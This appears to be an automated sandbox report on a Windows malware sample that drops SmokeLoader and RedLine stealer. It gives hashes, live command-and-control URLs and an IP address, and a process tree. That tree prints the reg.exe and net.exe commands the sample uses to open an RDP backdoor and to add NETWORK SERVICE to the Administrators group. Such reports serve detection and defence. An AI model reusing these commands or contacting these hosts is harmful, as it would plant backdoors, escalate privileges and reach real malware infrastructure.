Analysis
- max time kernel: 151s
- max time network: 152s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 09-12-2021 20:13
- Static task: static1
- Behavioral task: behavioral1
  Sample: 6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exe
  Resource: win10-en-20211208
General
- Target: 6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exe
- Size: 299KB
- MD5: 083542f4e476ff3aa13a42f86745cc45
- SHA1: 114bc59eb85668cf721b1f7b2aeeae9a0d6c79e8
- SHA256: 6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03
- SHA512: 663c8ac7a9aecb429d7b1dc79f4c15ac32c67d6b0764558503e29756df29422163ef652e35b7b511ab6d3c21e4088476c132d1ac2fcd4dc60cc5ea03a9b4af04
Malware Config
- Extracted
  https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
- Extracted: smokeloader
  Version: 2020
  C2:
  http://rcacademy.at/upload/
  http://e-lanpengeonline.com/upload/
  http://vjcmvz.cn/upload/
  http://galala.ru/upload/
  http://witra.ru/upload/
- Extracted: redline
  C2: 195.133.47.114:38627
Signatures
- RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.
- RedLine Payload (3 IoCs)
  Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\CB1C.exe | family_redline
  C:\Users\Admin\AppData\Local\Temp\CB1C.exe | family_redline
  behavioral1/memory/4728-133-0x0000000000930000-0x000000000099C000-memory.dmp | family_redline
- SmokeLoader
  Modular backdoor trojan in use since 2014.
- suricata: ET MALWARE Arechclient2 Backdoor CnC Init
- suricata: ET MALWARE ServHelper CnC Inital Checkin
- suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
  Processes:
  flow | pid | process
  101 | 2848 | powershell.exe
  103 | 2848 | powershell.exe
  104 | 2848 | powershell.exe
  105 | 2848 | powershell.exe
  107 | 2848 | powershell.exe
  109 | 2848 | powershell.exe
  111 | 2848 | powershell.exe
  113 | 2848 | powershell.exe
  115 | 2848 | powershell.exe
- Downloads MZ/PE file
- Executes dropped EXE (7 IoCs)
  Processes:
  pid | process
  4540 | CB1C.exe
  4728 | EC03.exe
  1736 | 4501.exe
  2088 | 9CF6.exe
  68 | Soffri.exe.com
  4920 | Soffri.exe.com
  4392 | RegAsm.exe
- Modifies RDP port number used by Windows (1 TTP)
- Sets DLL path for service in the registry (2 TTPs)
-
  Processes:
  resource | yara_rule
  \Windows\Branding\mediasrv.png | upx
  \Windows\Branding\mediasvc.png | upx
- Deletes itself (1 IoC)
  Processes:
  pid | process
  2024 |
- Drops startup file (1 IoC)
  Processes:
  description | ioc | process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UMMVpGkdto.url | Soffri.exe.com
- Loads dropped DLL (2 IoCs)
  Processes:
  pid | process
  4868 |
  4868 |
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Adds Run key to start application (2 TTPs, 2 IoCs)
  Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | 9CF6.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | 9CF6.exe
- Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
  flow | ioc
  120 | eth0.me
- Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  Processes:
  pid | process
  4728 | EC03.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes:
  description | pid | process | target process
  PID 4920 set thread context of 4392 | 4920 | Soffri.exe.com | RegAsm.exe
- Drops file in Program Files directory (4 IoCs)
  Processes:
  description | ioc | process
  File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | powershell.exe
- Drops file in Windows directory (19 IoCs)
  Processes:
  description | ioc | process
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBDFC.tmp | powershell.exe
  File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
  File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
  File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
  File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBDBA.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBDDB.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBDEB.tmp | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | powershell.exe
  File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
  File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_2caqrfal.hof.ps1 | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBD6B.tmp | powershell.exe
  File created | C:\Windows\branding\mediasrv.png | powershell.exe
  File created | C:\Windows\branding\mediasvc.png | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_khotwnlq.goc.psm1 | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
- Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exe
  Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exe
  Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exe
- Modifies data under HKEY_USERS (64 IoCs)
  Processes: powershell.exe (all rows)
  description | ioc
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0"
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632"
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3"
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
  Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424"
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3"
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422"
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet"
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"
- Modifies registry key (1 TTP, 1 IoC)
- Runs net.exe
- Runs ping.exe (1 TTP, 1 IoC)
- Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes:
  description | flow | ioc
  HTTP User-Agent header | 103 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 104 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 105 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 107 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes:
  pid | process
  3532 | 6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exe
  3532 | 6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exe
  2024 | (process name not recorded; 62 identical entries)
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  Processes:
  pid | process
  2024 |
- Suspicious behavior: LoadsDriver (2 IoCs)
  Processes:
  pid | process
  628 |
  628 |
- Suspicious behavior: MapViewOfSection (1 IoC)
  Processes:
  pid | process
  3532 | 6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes:
  description | pid | process
  Token: SeShutdownPrivilege | 2024 |
  Token: SeCreatePagefilePrivilege | 2024 |
  Token: SeShutdownPrivilege | 2024 |
  Token: SeCreatePagefilePrivilege | 2024 |
  Token: SeDebugPrivilege | 4540 | CB1C.exe
  Token: SeShutdownPrivilege | 2024 |
  Token: SeCreatePagefilePrivilege | 2024 |
  Token: SeShutdownPrivilege | 2024 |
  Token: SeCreatePagefilePrivilege | 2024 |
  Token: SeShutdownPrivilege | 2024 |
  Token: SeCreatePagefilePrivilege | 2024 |
  Token: SeDebugPrivilege | 3876 | powershell.exe
  Token: SeDebugPrivilege | 4288 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 4288 | powershell.exe
  Token: SeSecurityPrivilege | 4288 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 4288 | powershell.exe
  Token: SeLoadDriverPrivilege | 4288 | powershell.exe
  Token: SeSystemProfilePrivilege | 4288 | powershell.exe
  Token: SeSystemtimePrivilege | 4288 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 4288 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 4288 | powershell.exe
  Token: SeCreatePagefilePrivilege | 4288 | powershell.exe
  Token: SeBackupPrivilege | 4288 | powershell.exe
  Token: SeRestorePrivilege | 4288 | powershell.exe
  Token: SeShutdownPrivilege | 4288 | powershell.exe
  Token: SeDebugPrivilege | 4288 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 4288 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 4288 | powershell.exe
  Token: SeUndockPrivilege | 4288 | powershell.exe
  Token: SeManageVolumePrivilege | 4288 | powershell.exe
  Token: 33 | 4288 | powershell.exe
  Token: 34 | 4288 | powershell.exe
  Token: 35 | 4288 | powershell.exe
  Token: 36 | 4288 | powershell.exe
  Token: SeDebugPrivilege | 3476 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 3476 | powershell.exe
  Token: SeSecurityPrivilege | 3476 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 3476 | powershell.exe
  Token: SeLoadDriverPrivilege | 3476 | powershell.exe
  Token: SeSystemProfilePrivilege | 3476 | powershell.exe
  Token: SeSystemtimePrivilege | 3476 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 3476 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 3476 | powershell.exe
  Token: SeCreatePagefilePrivilege | 3476 | powershell.exe
  Token: SeBackupPrivilege | 3476 | powershell.exe
  Token: SeRestorePrivilege | 3476 | powershell.exe
  Token: SeShutdownPrivilege | 3476 | powershell.exe
  Token: SeDebugPrivilege | 3476 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 3476 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 3476 | powershell.exe
  Token: SeUndockPrivilege | 3476 | powershell.exe
  Token: SeManageVolumePrivilege | 3476 | powershell.exe
  Token: 33 | 3476 | powershell.exe
  Token: 34 | 3476 | powershell.exe
  Token: 35 | 3476 | powershell.exe
  Token: 36 | 3476 | powershell.exe
  Token: SeDebugPrivilege | 2120 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 2120 | powershell.exe
  Token: SeSecurityPrivilege | 2120 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 2120 | powershell.exe
  Token: SeLoadDriverPrivilege | 2120 | powershell.exe
  Token: SeSystemProfilePrivilege | 2120 | powershell.exe
  Token: SeSystemtimePrivilege | 2120 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 2120 | powershell.exe
- Suspicious use of FindShellTrayWindow (16 IoCs)
  Processes:
  pid | process
  2024 |
  68 | Soffri.exe.com
  2024 |
  2024 |
  68 | Soffri.exe.com
  68 | Soffri.exe.com
  2024 |
  2024 |
  4920 | Soffri.exe.com
  2024 |
  2024 |
  4920 | Soffri.exe.com
  4920 | Soffri.exe.com
  2024 |
  2024 |
  2024 |
- Suspicious use of SendNotifyMessage (11 IoCs)
  Processes:
  pid | process
  2024 |
  2024 |
  2024 |
  2024 |
  68 | Soffri.exe.com
  68 | Soffri.exe.com
  68 | Soffri.exe.com
  4920 | Soffri.exe.com
  4920 | Soffri.exe.com
  4920 | Soffri.exe.com
  2024 |
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes:
  description | pid | process | target process | times
  PID 2024 wrote to memory of 4540 | 2024 | | CB1C.exe | 3
  PID 2024 wrote to memory of 4728 | 2024 | | EC03.exe | 3
  PID 2024 wrote to memory of 1736 | 2024 | | 4501.exe | 2
  PID 1736 wrote to memory of 3876 | 1736 | 4501.exe | powershell.exe | 2
  PID 3876 wrote to memory of 792 | 3876 | powershell.exe | csc.exe | 2
  PID 792 wrote to memory of 948 | 792 | csc.exe | cvtres.exe | 2
  PID 3876 wrote to memory of 4136 | 3876 | powershell.exe | csc.exe | 2
  PID 4136 wrote to memory of 3776 | 4136 | csc.exe | cvtres.exe | 2
  PID 3876 wrote to memory of 4288 | 3876 | powershell.exe | powershell.exe | 2
  PID 3876 wrote to memory of 3476 | 3876 | powershell.exe | powershell.exe | 2
  PID 3876 wrote to memory of 2120 | 3876 | powershell.exe | powershell.exe | 2
  PID 2024 wrote to memory of 2088 | 2024 | | 9CF6.exe | 3
  PID 2088 wrote to memory of 4148 | 2088 | 9CF6.exe | expand.exe | 3
  PID 2088 wrote to memory of 4652 | 2088 | 9CF6.exe | cmd.exe | 3
  PID 4652 wrote to memory of 4680 | 4652 | cmd.exe | cmd.exe | 3
  PID 4680 wrote to memory of 588 | 4680 | cmd.exe | findstr.exe | 3
  PID 4680 wrote to memory of 68 | 4680 | cmd.exe | Soffri.exe.com | 3
  PID 4652 wrote to memory of 924 | 4652 | cmd.exe | PING.EXE | 3
  PID 68 wrote to memory of 4920 | 68 | Soffri.exe.com | Soffri.exe.com | 3
  PID 3876 wrote to memory of 4864 | 3876 | powershell.exe | reg.exe | 2
  PID 3876 wrote to memory of 4432 | 3876 | powershell.exe | reg.exe | 2
  PID 3876 wrote to memory of 4612 | 3876 | powershell.exe | reg.exe | 2
  PID 3876 wrote to memory of 5116 | 3876 | powershell.exe | net.exe | 2
  PID 5116 wrote to memory of 2644 | 5116 | net.exe | net1.exe | 2
  PID 3876 wrote to memory of 2176 | 3876 | powershell.exe | cmd.exe | 2
  PID 2176 wrote to memory of 1392 | 2176 | cmd.exe | cmd.exe | 2
  PID 1392 wrote to memory of 1340 | 1392 | cmd.exe | net.exe | 2
Processes
-
C:\Users\Admin\AppData\Local\Temp\6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exe"C:\Users\Admin\AppData\Local\Temp\6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\CB1C.exeC:\Users\Admin\AppData\Local\Temp\CB1C.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\EC03.exeC:\Users\Admin\AppData\Local\Temp\EC03.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\4501.exeC:\Users\Admin\AppData\Local\Temp\4501.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ibtvx3zm\ibtvx3zm.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5FCA.tmp" "c:\Users\Admin\AppData\Local\Temp\ibtvx3zm\CSCDA4A16889969497293E52CD9306BCD1A.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5ixcgkww\5ixcgkww.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES671D.tmp" "c:\Users\Admin\AppData\Local\Temp\5ixcgkww\CSCB83D55875EFA44CA9F382E8A109C8CB4.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
-
C:\Windows\system32\net.exenet start TermService5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Users\Admin\AppData\Local\Temp\9CF6.exeC:\Users\Admin\AppData\Local\Temp\9CF6.exe1⤵
- Executes dropped EXE
